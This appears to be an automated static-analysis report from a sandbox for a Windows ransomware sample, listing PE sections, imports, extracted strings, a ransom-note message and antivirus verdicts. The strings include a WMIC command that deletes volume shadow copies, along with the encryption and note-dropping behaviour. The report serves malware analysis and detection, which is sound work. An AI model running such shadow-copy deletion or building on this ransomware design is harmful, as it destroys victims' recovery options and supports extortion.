Static | ZeroBOX

PE Compile Time

2024-11-01 08:07:14

PE Imphash

7541e37d15e5e332b2a83de6c13bfcc2

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000192dc 0x00019400 6.49703588424
.rdata 0x0001b000 0x000138a8 0x00013a00 6.14866486589
.data 0x0002f000 0x00002964 0x00001800 5.63657019989
.pdata 0x00032000 0x00001500 0x00001600 5.0074140138
.rsrc 0x00034000 0x000001e0 0x00000200 4.71767883295
.reloc 0x00035000 0x000006a8 0x00000800 4.98481438324

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00034060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library ntdll.dll:
0x14001b318 RtlLookupFunctionEntry
0x14001b320 RtlVirtualUnwind
0x14001b328 ZwClose
0x14001b330 RtlCaptureContext
0x14001b338 RtlUnwindEx
0x14001b340 ZwWaitForSingleObject
0x14001b348 NtWaitForSingleObject
0x14001b350 NtWriteFile
0x14001b358 ZwReadFile
0x14001b360 ZwQueryInformationFile
0x14001b368 NtQueryAttributesFile
0x14001b370 ZwOpenFile
0x14001b378 ZwSetInformationFile
0x14001b380 RtlPcToFileHeader
Library KERNEL32.dll:
0x14001b038 LCMapStringW
0x14001b040 WriteConsoleW
0x14001b048 GetLastError
0x14001b050 WaitForMultipleObjects
0x14001b058 CreateThread
0x14001b060 GetLogicalDrives
0x14001b068 OutputDebugStringA
0x14001b070 OutputDebugStringW
0x14001b078 CloseHandle
0x14001b080 FindClose
0x14001b088 FindFirstFileW
0x14001b090 FindNextFileW
0x14001b098 MoveFileW
0x14001b0a0 GlobalAlloc
0x14001b0a8 GlobalFree
0x14001b0b0 CreateFileW
0x14001b0b8 WaitForSingleObject
0x14001b0c0 CreateProcessW
0x14001b0d8 lstrcpyW
0x14001b0e0 GetCurrentProcessId
0x14001b0e8 TerminateProcess
0x14001b0f0 GetConsoleMode
0x14001b0f8 GetConsoleOutputCP
0x14001b100 FlushFileBuffers
0x14001b108 HeapReAlloc
0x14001b110 FlsFree
0x14001b118 FlsSetValue
0x14001b120 FlsGetValue
0x14001b128 FlsAlloc
0x14001b130 GetProcessHeap
0x14001b138 SetStdHandle
0x14001b140 GetStringTypeW
0x14001b148 SetFilePointerEx
0x14001b150 GetNativeSystemInfo
0x14001b158 GetStartupInfoW
0x14001b160 FreeEnvironmentStringsW
0x14001b168 GetEnvironmentStringsW
0x14001b170 WideCharToMultiByte
0x14001b178 MultiByteToWideChar
0x14001b180 GetCommandLineW
0x14001b188 GetCommandLineA
0x14001b190 HeapSize
0x14001b198 IsDebuggerPresent
0x14001b1a0 UnhandledExceptionFilter
0x14001b1b0 GetCPInfo
0x14001b1c0 GetModuleHandleW
0x14001b1c8 QueryPerformanceCounter
0x14001b1d0 GetCurrentThreadId
0x14001b1d8 GetSystemTimeAsFileTime
0x14001b1e0 InitializeSListHead
0x14001b1e8 RaiseException
0x14001b1f0 SetLastError
0x14001b1f8 EnterCriticalSection
0x14001b200 LeaveCriticalSection
0x14001b208 DeleteCriticalSection
0x14001b218 TlsAlloc
0x14001b220 TlsGetValue
0x14001b228 TlsSetValue
0x14001b230 TlsFree
0x14001b238 FreeLibrary
0x14001b240 GetProcAddress
0x14001b248 LoadLibraryExW
0x14001b250 EncodePointer
0x14001b258 GetCurrentProcess
0x14001b260 ExitProcess
0x14001b268 GetModuleHandleExW
0x14001b270 GetModuleFileNameW
0x14001b278 GetStdHandle
0x14001b280 WriteFile
0x14001b288 HeapFree
0x14001b290 HeapAlloc
0x14001b298 GetFileType
0x14001b2a0 FindFirstFileExW
0x14001b2a8 IsValidCodePage
0x14001b2b0 GetACP
0x14001b2b8 GetOEMCP
Library USER32.dll:
0x14001b308 wsprintfW
Library ole32.dll:
0x14001b390 CoInitializeSecurity
0x14001b398 CoInitializeEx
0x14001b3a0 CoUninitialize
0x14001b3a8 CoSetProxyBlanket
0x14001b3b0 CoCreateInstance
Library OLEAUT32.dll:
0x14001b2e8 SysAllocString
0x14001b2f0 VariantInit
0x14001b2f8 VariantClear
Library ADVAPI32.dll:
0x14001b000 CryptEncrypt
0x14001b008 CryptImportKey
0x14001b010 CryptGenRandom
0x14001b018 CryptDestroyKey
0x14001b020 CryptReleaseContext
0x14001b028 CryptAcquireContextA
Library MPR.dll:
0x14001b2c8 WNetOpenEnumW
0x14001b2d0 WNetEnumResourceW
0x14001b2d8 WNetCloseEnum

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
WinMain
Code1: %d. error %d
Code2: %d. error %d
Detected attribute read only.
encryptPrepare
Failed to open file.
ZwSetInformationFile failed.
Failed to open file for encrypt. Error: %d
Failed to get entropy for key
initKeyHeader
Failed to get entropy for nonce
Failed to encrypt key header
writeKeyHeader
Failed to write keydata. Error: %d
Failed to open file for encrypt.
FileCrypt::encryptFile
File information query failed.
File is small.
Failed to allocate buffer.
Failed to initialize key header.
Failed to read file. Error: %d
Failed to write file. Error: %d
Failed to write key header. Error: %d
Failed to initialize crypto api.
CoreService::getCryptoProvider
[%s] %s
CryptImportKey failed with error: %d
CryptoApi::importPublic
CryptAcquireContextA failed with error: %d
CryptoApi::init
Failed to encrypt with error: %d
CryptoApi::encrypt
Allocation failed
buildObjectAttributes
Failed to build object attributes
Fs::getFileAttributes
Fs::open
expand 32-byte k
expand 16-byte k
D7q/;M
Detected restricted extension!
processFile
Some error
processDirectoryInternal
DecryptInstruction::emplaceInstruction
Failed to write instruction note
Unknown exception
bad allocation
bad array new length
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
bad exception
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1#QNAN
1#SNAN
.text$di
.text$mn
.text$mn$00
.text$mn$21
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
.rsrc$01
.rsrc$02
ZwClose
ZwSetInformationFile
ZwOpenFile
NtQueryAttributesFile
ZwQueryInformationFile
ZwReadFile
NtWriteFile
NtWaitForSingleObject
ZwWaitForSingleObject
ntdll.dll
GetLastError
WaitForMultipleObjects
CreateThread
GetLogicalDrives
OutputDebugStringA
OutputDebugStringW
CloseHandle
FindClose
FindFirstFileW
FindNextFileW
MoveFileW
GlobalAlloc
GlobalFree
CreateFileW
WaitForSingleObject
CreateProcessW
GetNativeSystemInfo
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
lstrcpyW
GetCurrentProcessId
TerminateProcess
KERNEL32.dll
wsprintfW
USER32.dll
CoUninitialize
CoInitializeEx
CoInitializeSecurity
CoSetProxyBlanket
CoCreateInstance
ole32.dll
OLEAUT32.dll
CryptAcquireContextA
CryptReleaseContext
CryptDestroyKey
CryptGenRandom
CryptImportKey
CryptEncrypt
ADVAPI32.dll
WNetOpenEnumW
WNetEnumResourceW
WNetCloseEnum
MPR.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
RtlUnwindEx
RtlPcToFileHeader
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
GetModuleHandleW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
GetCurrentProcess
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
HeapFree
HeapAlloc
GetFileType
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
GetProcessHeap
SetStdHandle
GetStringTypeW
SetFilePointerEx
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Start share: %s
s[%hs] %s
$recycle.bin
system volume information
windows
perflogs
.cache
microsoft
Mozilla*
Google*
Windows*
desktop.ini
Failed to move file! Original: %s, New path: %s
DECRYPT-INSTRUCTION.txt
Create instruction note: %s
Failed to create instruction note: %s. err %d
__ProviderArchitecture
ROOT\CIMV2
SELECT * FROM Win32_ShadowCopy
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='%s'" delete
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
You are stupid idiot
Your files have been encrypted with strong algorithm.
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Agent.Y!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal TrojanRansom.Agent
Skyhigh BehavesLike.Win64.NetLoader.ch
ALYac Trojan.GenericKD.74635134
Cylance Unsafe
Zillya Clean
CrowdStrike win/malicious_confidence_90% (D)
Alibaba Trojan:Win64/Filecoder.2194c8e5
K7GW Trojan ( 005bce751 )
K7AntiVirus Trojan ( 005bce751 )
huorong Clean
Baidu Clean
VirIT Trojan.Win64.Agent.FZG
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win64/Filecoder.QF
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Ransom.Win32.Agent.gen
BitDefender Trojan.GenericKD.74635134
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.74635134
Tencent Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/AD.Nekark.fxmbb
DrWeb Trojan.Encoder.41221
VIPRE Trojan.GenericKD.74635134
TrendMicro Clean
McAfeeD ti!E195BEF31E5A
Trapmine Clean
CTX exe.trojan.generic
Emsisoft Trojan.GenericKD.74635134 (B)
Ikarus Trojan-Ransom.FileCrypter
FireEye Generic.mg.a44a69112351292c
Jiangmin Clean
Webroot Clean
Varist W64/ABRansom.EGGG-4478
Avira TR/AD.Nekark.fxmbb
Fortinet PossibleThreat.MPH.H
Antiy-AVL Trojan[Ransom]/Win32.Dcrypt.a
Kingsoft Win32.Trojan-Ransom.Agent.gen
Gridinsoft Trojan.Win64.Agent.sa
Xcitium Malware@#3ftdywqvz7jio
Arcabit Trojan.Generic.D472D77E
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Ransom.Win32.Agent.gen
Microsoft Trojan:Win32/GandCrab
Google Detected
AhnLab-V3 Ransomware/Win.Generic.C5690458
Acronis Clean
McAfee Artemis!A44A69112351
TACHYON Clean
VBA32 Clean
Malwarebytes Ransom.FileCryptor
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09K524
Rising Ransom.Agent!8.6B7 (CLOUD)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData Trojan.GenericKD.74635134
AVG Win64:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.